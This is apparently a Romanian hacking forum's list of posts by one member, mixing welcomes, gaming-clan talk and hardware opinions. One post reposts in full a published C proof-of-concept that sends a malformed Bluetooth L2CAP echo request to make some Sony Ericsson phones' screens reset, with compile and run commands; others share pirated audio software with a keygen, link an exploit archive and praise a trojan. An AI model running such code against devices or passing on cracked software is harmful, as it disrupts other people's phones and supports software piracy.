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Everything posted by phantomas
welcome , sper sa stai cat mai mult printre noi si inca ceva important ( read the rules )
din pasiune sa invat cat mai multe despre programe , calc si tot ce tine de ele ( si razbunare la greuuu )
MP3 Cutter Joiner is a powerful and easy-to-use audio editor, which builds audio cutter and joiner into one. Supports MP3, WAV, WMA and OGG format. You can cut a new small file from a large audio file, and you can also merge multiple files to a large new one. Supports batch cutting. With a small audio player built in, you can set the cutting/joining's start-time/end-time just when pre-listening to the song. Cutting/joining in high precision and no quality is lost! What's more, you can complete cutting and joining in just one command. In other words, if you have several files and want to cut a part from every song and then merge those parts into one file, all you need to do is just setting the start-time and end-time for every part and then click "Join" button. E foarte usor de folosit , il puteti folosi cei care au telefoane cu mp3 si numai aveti destul spatiu , taieti o mel si puneti ce va place sper sa fie de folos pt unii enjoy ( keygen inclus ) Download : http://rapidshare.de/files/28489030/Instal...keygen.rar.html
thanx a lot man , ma ajutat destul de mult keep'it up man
crt ( sau monitor normal ) parerea mea e mai bun decat un lcd , timp de raspuns 0 , radiatii low....
LOL !!! ( luat de pe milworm ) /* Sony/Ericsson reset display - PoC */ /* Pierre BETOUIN - [email]pierre.betouin@infratech.fr[/email] */ /* 05-02-2006 */ /* Vulnerability found using BSS fuzzer : */ /* Download [url]www.secuobs.com/news/05022006-bluetooth10.shml[/url] */ /* */ /* Causes anormal behaviours on some Sony/Ericsson */ /* cell phones */ /* Vulnerable tested devices : */ /* - K600i */ /* - V600i */ /* - K750i */ /* - W800i */ /* - And maybe other ones... */ /* */ /* Vulnerable devices will slowly turn their screen into */ /* black and then display a white screen. */ /* After a short period (~45sec), they will go back to */ /* their normal behaviour */ /* */ /* gcc -lbluetooth reset_display_sonyericsson.c */ /* -o reset_display_sonyericsson */ /* ./reset_display_sonyericsson 00:12:EE:XX:XX:XX */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <bluetooth/bluetooth.h> #include <bluetooth/hci.h> #include <bluetooth/l2cap.h> #define SIZE 4 #define FAKE_SIZE 1 // SIZE - 3 (3 bytes <=> L2CAP header) int main(int argc, char **argv) { char *buffer; l2cap_cmd_hdr *cmd; struct sockaddr_l2 addr; int sock, sent, i; if(argc < 2) { fprintf(stderr, "%s <btaddr>n", argv[0]); exit(EXIT_FAILURE); } if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0) { perror("socket"); exit(EXIT_FAILURE); } memset(&addr, 0, sizeof(addr)); addr.l2_family = AF_BLUETOOTH; if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) { perror("bind"); exit(EXIT_FAILURE); } str2ba(argv[1], &addr.l2_bdaddr); if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) { perror("connect"); exit(EXIT_FAILURE); } if(!(buffer = (char *) malloc ((int) SIZE + 1))) { perror("malloc"); exit(EXIT_FAILURE); } memset(buffer, 90, SIZE); cmd = (l2cap_cmd_hdr *) buffer; cmd->code = L2CAP_ECHO_REQ; cmd->ident = 1; cmd->len = FAKE_SIZE; if( (sent=send(sock, buffer, SIZE, 0)) >= 0) { printf("L2CAP packet sent (%d)n", sent); } printf("Buffer:t"); for(i=0; i<sent; i++) printf("%.2X ", (unsigned char) buffer[i]); printf("n"); free(buffer); close(sock); return EXIT_SUCCESS; } // milw0rm.com [2006-02-06] sper sa fie de folos
welcome man , vad ca deja iti luam replica "pace" e chiar marfa
Hacking masina de Coca Cola Tutorial by SpiridusuCaddy
phantomas replied to Pastilatu''s topic in Tutoriale in romana
Xavier mergem sigur sa vezi ce ne umflam de cola ))))) -
lol da am facut si poza in caz de mai zice cineva de mine ceva asta e pt andrey care zice "ai verificat cumva inainte sa postezi" pai normal ma frate tu ce crezi ca sunt tampit sa postez aiurea ??
np man dar inainte verifica ce pui pe forum pace si tie
nice trojan man nice post any way
AMD Sempron 2550+ tre sal schimb cel mai varza e sempronu
Xavier stai klma ca se pun unele regui si la admini/echpei , ca acu daca esti din echipa nu inseamna ca poti folosi cheaturi , sau alte reguli de pe acolo
<div class='quotetop'>QUOTE("zbeng")</div> da nui nici o problema , tot ala care are scoru mai mic iese nui nici o diferenta daca stai sa te gandesti , si zic eu ca vom juca 2 harti ( 1- de_dust2 , 2- fy_snow sau fy_dustworld ) asta depinde daca vor fiecare asa , astept raspunsu vostru
my nickname phantomas
eu zic cel mai bine e sa facem un meci si cel care are cel mai prost scor sa iasa , nu conteaza Fata|1ty daca stii sau nu , vom vedea dupa scor... daca sunte-ti de acord postati sa vedem ce iese... :@
<div class='quotetop'>QUOTE("Sad_Dreamer")</div> Sorry man cei care nu au treaba cu hackingul/programare nu o sa fie banati nici in visele tale , dupa cate stiu forumul e facut sa ajute si sa invete lumea sa faca hacking/programare , normal mai sunt cativa ca tine care se cred hackeri...dar in fine...
Uite aici un site ( contine cam 1200 de exploturi ) enjoy http://securitydot.net/exploits.php
Welcome razor , read the rules ( e pt binele tau )
ce link marfa ai postat -403 FORBIDDEN - INCORRECT OR MISSING REFERRER FOR REQUESTED FILE - deci...intai vezi daca merge si dupa aia posteaza
lol Ne pare rau, pagina cautata nu este accesibila. inca mai ai de lucrat la ea.... :@
link don't exist ( tut video ) plss upload again
lol account cracked